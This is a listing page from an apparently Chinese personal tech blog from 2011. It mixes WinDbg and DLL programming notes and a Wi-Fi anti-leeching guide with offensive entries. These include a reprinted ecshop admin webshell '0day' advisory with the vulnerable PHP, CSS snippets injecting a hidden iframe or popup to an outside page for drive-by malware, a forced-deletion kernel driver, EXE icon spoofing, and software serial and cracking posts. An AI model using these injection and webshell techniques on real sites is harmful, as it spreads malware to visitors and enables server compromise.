【转】找出iis最占资源的站点
作者:admin 日期:2011-02-21
VS2008序列号/注册码
作者:admin 日期:2011-02-19
xcopy复制整个目录
作者:admin 日期:2011-02-18
windbg命令详解
作者:admin 日期:2011-02-17
DLL
该扩展仅在内核模式下使用,即使它是在Ext.dll中的。
Windows NT 4.0 |
Ext.dll |
Windows 2000 |
Ext.dll |
Windows XP和之后 |
Ext.dll |
注释
如果不提供参数,调试器会列出所有进程,以及时间和优先级统计。这和使用!process @#Process 0 作为CommandString值一样。
To terminate execution at any point, press CTRL+BREAK (in WinDbg) or CTRL+C (in KD).
附加信息
关于进程的一般信息,查看线程和进程。进程操作和获取进程信息,查看控制进程和线程。
!for_each_thread
!for_each_thread 扩展对目标机中每个线程执行一次指定的调试器命令。
windbg命令解释(非常详细)
作者:admin 日期:2011-02-17
WinDBG中查看调用栈的命令
作者:admin 日期:2011-02-17
WinDBG断点命令详解
作者:admin 日期:2011-02-17
ms11-011利用工具
作者:admin 日期:2011-02-16
asp fso参考手册
作者:admin 日期:2011-02-16
查看占用端口的进程
作者:admin 日期:2011-02-16
ecshop后台写shell
作者:admin 日期:2011-02-16
------------------------------------------------------------------------------
Title:ecshop后台写shell 0day
Author: xhm1n9[ESST]
EMail:xhm1n9@0x70.com
Site: http://www.x-xox-x.net
Date: 2010-12-27 10:22:15
From: http://x-xox-x.net/exploit/11
3月份的东西,现在发出来。
adminedit_languages.php
相关变量没过滤!
elseif ($_REQUEST['act'] == 'edit')
{
/* 语言项的路径 */
$lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';
/* 替换前的语言项 */
$src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['item']) : '';
Tags: ecshop webshell ecshop拿shell
发IRP强制删除文件
作者:admin 日期:2011-02-16
学习了下,顺便加点注释。这个程序比较简单,主要练习了两个点:
(1)模拟发送IRP
(2)使用内核事件对象同步IRP的执行
强制删除文件的思路很简单,把SECTION_OBJECT_POINTERS结构的DataSectionObject和ImageSectionObject两个域清空即可删除正在运行的文件。如果不清空就不能删除运行中的文件。正在运行的文件的这两个域值不为0而文件系统正在根据这两个域决定该文件是否可以删除。如果文件系统检测这两个值为0,就理解为文件没有被使用,可以删除。接下去,就是直接发IRP。
测试时,在C盘目录下放一个test.exe并执行,然后加载驱动即可。
强制删除文件功能在ForceDeleteFile中实现,DriverEntry中只需要简单调用即可。具体实现如下
资源操作相关函数
作者:admin 日期:2011-02-12
最近遇到了这样个问题:编程实现修改EXE程序的图标,比如把一个EXE程序图标改为pdf、word等图标。。。。。
问题终于解决了,其中最主要的就是涉及到资源函数的相应操作。故发此文。。。。。。。。。
1、FindResource函数:该函数确定指定模块中指定类型和名称的资源所在位置。
HRSRC FindResource(
HMODULE hModule, //资源所在EXE、DLL模块句柄;
LPCWSTR lpName, //资源名称
LPCWSTR lpType ); //资源类型
返回值:成功则返回资源句柄,将此句柄传递给LoadResource函数。
注意:如果参数lpType或lpName的高字节为O,那么其低字节中所给定的资源的类
型或名称标识说明。另外,这些参数指向以NULL为终止符的字符串。字符串的第
一个字符是#,后面的字符表示十进制数来表示源类型或名称的整数标识符。例
DLL中导出全局变量
作者:admin 日期:2011-02-12
vc 模块定义(def) 文件
作者:admin 日期:2011-02-12
vc 模块定义 (.def) 文件2008年08月03日 星期日 16:33模块定义 (.def) 文件为链接器提供有关被链接程序的导出、属性及其他方面的信息。生成 DLL 时,.def 文件最有用。由于存在可代替模块定义语句使用的链接器选项,通常不需要 .def 文件。也可以将 __declspec(dllexport) 用作指定导出函数的手段。
在链接器阶段可以使用 /DEF(指定模块定义文件)链接器选项调用 .def 文件。
如果生成的 .exe 文件没有导出,使用 .def 文件将使输出文件较大并降低加载速度。
有关更多信息,请参见下列章节:
Tags: def vc vc 模块定义(def) 文件
ultraedit16.20序列号
作者:admin 日期:2011-02-06
ultraedit16.20序列号
闲话不说,直接上破解方法。
首先下载官网的软件:地址(http://www.ultraedit.com/files/ue_chinese.zip)
安装。
视频和声音错位
作者:admin 日期:2011-02-05
如何防止蹭网
作者:admin 日期:2011-02-03
蹭网,不用说大家都知道。就是用一个大功率的无线网卡,破解了人家的密码,然后在别人不知情的情况下连接路由器上网。这里不多说,直接说说怎么防止蹭网。
先说说怎么发现蹭网吧。
- 因为我现在用的是win7,所以以win7为例。打开计算机,点击一下左侧的那个网络标志。就会发现局域网中的一些机器。看看有米有不认识的,不认识的话去找你的同伴问问他的计算机名。当然盗网者也可以设置不被发现。这样这种方法就失效了。
- 说说第二种方法。打开浏览器,输入路由器的地址,比如是192.168.1.1。登陆之后点击左侧的DHCP服务器,然后点击客户端列表。这样就会发现所有的电脑。这种方法的可靠之处在于可以发现所有的电脑,所以大家可以根据计算机名,或者MAC地址去核对有没有人蹭网。
有这两种方法基本上就可以发现蹭网者了。
如何知道自己的MAC地址?好我告诉你两个方法。
- 打开计算机,右击左侧的网络图标,选择属性。来到网络和共享中心。单击右边的本地连接,然后单击详细信息按钮。这时可以看到自己的物理地址,也就是MAC地址了。00-D8-A1-40-9F-62,一般是这种格式。
- 第二种方法更简单,用到了命令行。按一下快捷键win+R打开运行对话框,输入cmd,出现命令提示符窗口。输入ipconfig /all 也可以看到自己的物理地址。
Tags: 如何防止蹭网
玩转arp
作者:admin 日期:2011-02-03
CSS挂马代码的方法
作者:admin 日期:2011-02-03
网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下: